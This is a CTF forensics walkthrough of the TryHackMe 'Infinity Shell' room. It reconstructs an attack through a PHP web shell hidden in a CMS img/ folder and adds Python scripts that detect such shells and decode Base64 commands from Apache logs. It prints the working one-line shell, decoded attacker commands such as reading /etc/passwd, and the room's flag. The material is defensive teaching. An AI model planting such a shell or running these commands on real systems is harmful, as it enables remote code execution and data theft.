TryHackMe Infinity Shell Walkthrough: Web Shell Forensics & CTF Guide
This article describes a web application forensics task from a CTF challenge: analysing the directories of a CMS site uncovers a malicious PHP web shell (images.php) hidden in the img/ folder, the Base64-encoded attacker commands are pulled from the Apache logs and decoded, and the CTF flag THM{sup3r_34sy_w3bsh3ll} is recovered. 2025-10-4 10:55:3 Author: infosecwriteups.com

Death Esther

Introduction

In the TryHackMe Infinity Shell room, I tackled a web application forensics challenge focused on detecting a malicious PHP web shell on a CMS site. This walkthrough covers discovering the shell, decoding Base64 commands, and extracting the CTF flag, while demonstrating how attackers hide files in directories like img/ or uploads/ for remote code execution. Perfect for beginners learning web security or CTF enthusiasts sharpening forensic skills.

Identifying the Web Application & Finding the Malicious Web Shell

I started this challenge by looking for a web application on the box — the usual first step in web application forensics and TryHackMe CTFs. From the web root I found a CMS project that looked promising:

cd /var/www/html/
ls

Seeing CMSsite-master told me this was a CMS-based site (common attack surface), so I dove into that directory.

cd CMSsite-master
ls -la

Hunting for suspicious files

Attackers commonly hide web shells in places that look innocuous — img/, uploads/, includes/, etc. I listed the img/ directory and found a tiny images.php file next to normal image files:

cd img/
ls -la

When I examined images.php it was immediately suspicious:

cat images.php
<?php system(base64_decode($_GET['query'])); ?>

This single line is a classic web shell pattern: it accepts base64-encoded commands via a query parameter and executes them on the server. That’s the attacker’s entry point — a direct remote command execution vector. At this point I knew I had to trace how the shell was used and what commands the attacker ran.
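
A one-liner like this is also easy to sweep for. The following is an added Python example, not code from the room or from the author's writeup: it walks a web root, flags server-side scripts that sit in image or upload directories, and flags scripts in which request data (`$_GET`, `$_POST`, ...) reaches a command or eval sink, optionally through a decoder such as base64_decode. The directory names, extensions and the small sample tree it builds (which reproduces the layout described above) are constructed assumptions for the demo; on a real box you would point `scan_webroot` at /var/www/html.

```python
import os
import re
import tempfile

# Directories where server-side scripts are not expected on this kind of site.
# Constructed list for the example; tune it to the CMS you actually run.
SUSPECT_DIRS = {"img", "images", "uploads", "upload", "media", "assets"}
SCRIPT_EXT = {".php", ".phtml", ".php5", ".phar"}

# Patterns that characterise one-line web shells such as
# <?php system(base64_decode($_GET['query'])); ?>
EXEC_SINK = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.I)
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
DECODER = re.compile(r"\b(base64_decode|str_rot13|gzinflate|gzuncompress)\s*\(", re.I)


def scan_file(path, root):
    """Return a finding dict for one file, or None if nothing looks off."""
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    parts = rel.split("/")
    ext = os.path.splitext(rel)[1].lower()
    reasons = []

    # Location check: a .php file among images is suspicious on its own.
    if ext in SCRIPT_EXT and any(p.lower() in SUSPECT_DIRS for p in parts[:-1]):
        reasons.append("script in media/upload directory")

    # Content check: request data flowing into an execution sink.
    if ext in SCRIPT_EXT:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            src = fh.read()
        has_sink = EXEC_SINK.search(src)
        if has_sink and USER_INPUT.search(src):
            reasons.append("request data reaches a command/eval sink")
        if has_sink and DECODER.search(src):
            reasons.append("encoded payload fed to a sink")

    if not reasons:
        return None
    return {"relpath": rel, "size": os.path.getsize(path), "reasons": reasons}


def scan_webroot(root):
    """Scan every file below root and return the findings sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            hit = scan_file(os.path.join(dirpath, name), root)
            if hit:
                findings.append(hit)
    return sorted(findings, key=lambda f: f["relpath"])


def build_sample_tree():
    """Constructed mini web root mirroring the room's layout (not the real box)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "CMSsite-master/index.php": "<?php include 'includes/header.php'; echo 'home'; ?>\n",
        "CMSsite-master/img/logo.png": "\x89PNG\r\n\x1a\n",
        "CMSsite-master/img/images.php": "<?php system(base64_decode($_GET['query'])); ?>\n",
        "CMSsite-master/includes/db.php": "<?php $conn = mysqli_connect('localhost', 'u', 'p'); ?>\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_sample_tree()):
        print(f"{f['relpath']} ({f['size']} bytes): {'; '.join(f['reasons'])}")
```

The location rule fires even when the content looks harmless, which is deliberate: a CMS has no business serving PHP out of img/, so the file's presence is the finding and the content only tells you how bad it is. The regexes are a triage heuristic, not a PHP parser; obfuscated shells that build function names at runtime will slip past them, so pair this with file-integrity monitoring of the web root.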

Extracting web shell usage from Apache logs

I filtered the Apache access logs for requests to images.php to get a clear timeline of what the attacker ran through the web shell. Instead of reading every line by hand, I searched for requests containing images.php? and pulled the Base64 payloads that were passed in the query parameter. That gave me a concise list of encoded commands to decode and analyse.

cd /var/log/apache2/
grep 'images.php?' other_vhosts_access.log.1

The Apache logs contained several GET requests targeting images.php, each passing Base64-encoded commands in the query parameter.

GET /CMSsite-master/img/images.php?query=ZWNobyAnVEhNe3...ScK HTTP/1.1

Decoding the commands

I decoded each Base64 string to reveal the actual shell commands the attacker executed. These are the encoded values pulled from the query parameter:

d2hvYW1pCg==
bHMK
ZWNobyAnVEhNe3N1cDNyXzM0c3lfdzNic2gzbGx9Jwo=
aWZjb25maWcK
Y2F0IC9ldGMvcGFzc3dkCg==
aWQK
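
The grep-then-decode step above can be made repeatable. The following is an added Python example (mine, not part of the original walkthrough): it parses Apache vhost_combined log lines of the kind found in other_vhosts_access.log, keeps only requests whose path is the shell, extracts the query parameter and Base64-decodes it into a timeline. The log lines, client IP, timestamps and response sizes are constructed for the demo; only the Base64 values come from the list above, plus one deliberately broken value to show the error path.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in Apache "vhost_combined" format (what other_vhosts_access.log
# uses). Host, IP, timestamps and sizes are made up; the query values are the
# Base64 strings from the walkthrough, one of them percent-encoded, plus one
# value that is not valid Base64.
SAMPLE_LOG = """\
localhost:80 10.10.14.7 - - [05/Mar/2024:13:02:11 +0000] "GET /CMSsite-master/img/logo.png HTTP/1.1" 200 4310 "-" "Mozilla/5.0"
localhost:80 10.10.14.7 - - [05/Mar/2024:13:02:40 +0000] "GET /CMSsite-master/img/images.php?query=d2hvYW1pCg== HTTP/1.1" 200 213 "-" "Mozilla/5.0"
localhost:80 10.10.14.7 - - [05/Mar/2024:13:02:51 +0000] "GET /CMSsite-master/img/images.php?query=bHMK HTTP/1.1" 200 345 "-" "Mozilla/5.0"
localhost:80 10.10.14.7 - - [05/Mar/2024:13:03:05 +0000] "GET /CMSsite-master/img/images.php?query=ZWNobyAnVEhNe3N1cDNyXzM0c3lfdzNic2gzbGx9Jwo%3D HTTP/1.1" 200 229 "-" "Mozilla/5.0"
localhost:80 10.10.14.7 - - [05/Mar/2024:13:03:20 +0000] "GET /CMSsite-master/img/images.php?query=aWZjb25maWcK HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
localhost:80 10.10.14.7 - - [05/Mar/2024:13:03:33 +0000] "GET /CMSsite-master/img/images.php?query=Y2F0IC9ldGMvcGFzc3dkCg== HTTP/1.1" 200 2170 "-" "Mozilla/5.0"
localhost:80 10.10.14.7 - - [05/Mar/2024:13:03:41 +0000] "GET /CMSsite-master/img/images.php?query=aWQK HTTP/1.1" 200 258 "-" "Mozilla/5.0"
localhost:80 10.10.14.7 - - [05/Mar/2024:13:04:02 +0000] "GET /CMSsite-master/img/images.php?query=not*base64 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

# Fields we need from a log line; the leading "vhost:port " is optional so plain
# combined-format lines (access.log) parse as well.
LOG_RE = re.compile(
    r'^(?:(?P<vhost>\S+)\s+)?(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<time>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"\s+(?P<status>\d{3})'
)


def decode_query(value):
    """Decode one Base64 payload as it appeared in the URL; None if it is not Base64.

    parse_qs already un-percent-encodes (%3D -> =) but also turns '+' into a
    space, which would corrupt a Base64 alphabet character, so put it back.
    Missing '=' padding is restored before decoding.
    """
    value = value.strip().replace(" ", "+")
    value += "=" * (-len(value) % 4)
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def extract_shell_commands(lines, shell_path="/CMSsite-master/img/images.php", param="query"):
    """Return one (timestamp, client_ip, status, command) tuple per request to the shell."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != shell_path:
            continue
        for value in parse_qs(url.query).get(param, []):
            cmd = decode_query(value)
            hits.append((
                m.group("time"),
                m.group("ip"),
                int(m.group("status")),
                cmd if cmd is not None else f"<undecodable: {value!r}>",
            ))
    return hits


if __name__ == "__main__":
    for when, ip, status, cmd in extract_shell_commands(SAMPLE_LOG.splitlines()):
        print(f"{when}  {ip}  {status}  {cmd.rstrip()}")
```

Two details worth noticing when you run it: every decoded command ends in a newline, which is what you get when a payload is produced with `echo whoami | base64`, and the undecodable request is kept in the timeline rather than dropped, because a failed or malformed attempt is still evidence of who was poking at the shell and when.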

What is the flag?

THM{sup3r_34sy_w3bsh3ll}

Conclusion

The Infinity Shell room on TryHackMe provided a hands-on experience in web application forensics and web shell analysis. By carefully inspecting the CMS directories, identifying the malicious images.php web shell, and decoding Base64 commands from Apache logs, I was able to reconstruct the attacker’s actions and retrieve the CTF flag: THM{sup3r_34sy_w3bsh3ll}.

This challenge highlights the importance of monitoring web directories for suspicious files, analyzing server logs for unusual activity, and understanding how attackers leverage hidden web shells for remote code execution. Whether you are new to CTFs or looking to sharpen your web forensics and penetration testing skills, this room reinforces critical skills for identifying and mitigating web-based attacks.

Source: https://infosecwriteups.com/tryhackme-infinity-shell-walkthrough-web-shell-forensics-ctf-guide-1230f5b1aa56?source=rss----7b722bfd1b8d---4